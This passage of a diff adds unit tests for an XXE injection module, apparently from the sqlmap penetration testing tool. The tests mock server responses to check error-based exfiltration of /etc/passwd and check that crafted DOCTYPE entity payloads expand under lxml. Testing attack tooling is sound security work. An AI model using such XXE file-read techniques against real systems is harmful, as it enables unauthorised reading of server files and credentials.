self.assertIsNotNone(payload) + self.assertIsNotNone(xxe._fingerprint(page)) + + def test_error_based_echo_rejected(self): + xxe._send = lambda body: "You sent: %s" % body # echoes DOCTYPE/ENTITY -> _echoed guard + payload, _ = xxe._tryError("x", "u") + self.assertIsNone(payload) + + def test_error_exfil_extraction_base64(self): + import base64 + from lib.core.convert import getText + secret = getText(base64.b64encode(b"root:x:0:0:root:/root:/bin/sh")) + + def mock(body): + m = re.search(r'file:///(\w+)/%file;', body) or re.search(r'file:///(\w+)/%file;', body) + marker = m.group(1) if m else "zzz" + return 'failed to load "file:///%s/%s"' % (marker, secret) + + xxe._send = mock + conf.fileRead = "/etc/passwd" + try: + content, name = xxe._tryErrorExfil("x", "u") + finally: + conf.fileRead = None + self.assertEqual(name, "/etc/passwd") + self.assertIn("root:x:0:0", content or "") + + +class TestRealXmlPayloads(unittest.TestCase): + """Prove crafted payloads are well-formed and actually expand the entity.""" + + @staticmethod + def _expand(payload): + try: + from lxml import etree + except ImportError: + raise unittest.SkipTest("lxml not available") + parser = etree.XMLParser(resolve_entities=True, load_dtd=True, no_network=True, huge_tree=False) + doc = etree.fromstring(payload.encode("utf-8"), parser) + return "".join(doc.itertext()) + + def test_internal_entity_expands(self): + xxe.SENTINEL = "realxmlsentinel" + ent = "abcd" + subset = '' % (ent, xxe.SENTINEL) + payload = xxe._placeRef(xxe._buildDoctype("luther", "u", subset), "&%s;" % ent) + self.assertIn(xxe.SENTINEL, self._expand(payload)) + + def test_internal_entity_expands_with_existing_doctype(self): + xxe.SENTINEL = "realxmlsentinel2" + ent = "efgh" + subset = '' % (ent, xxe.SENTINEL) + base = ']>luther' + payload = xxe._placeRef(xxe._buildDoctype(base, "u", subset), "&%s;" % ent) + self.assertIn(xxe.SENTINEL, self._expand(payload)) + + def test_attribute_entity_expands(self): + xxe.SENTINEL = "attrsentinel" + ent = "ijkl" + subset = '' % (ent, xxe.SENTINEL) + payload = xxe._placeRef(xxe._buildDoctype('x', "u", subset), "&%s;" % ent, attrs=True) + self.assertIn(xxe.SENTINEL, self._expand(payload)) + + +if __name__ == "__main__": + unittest.main()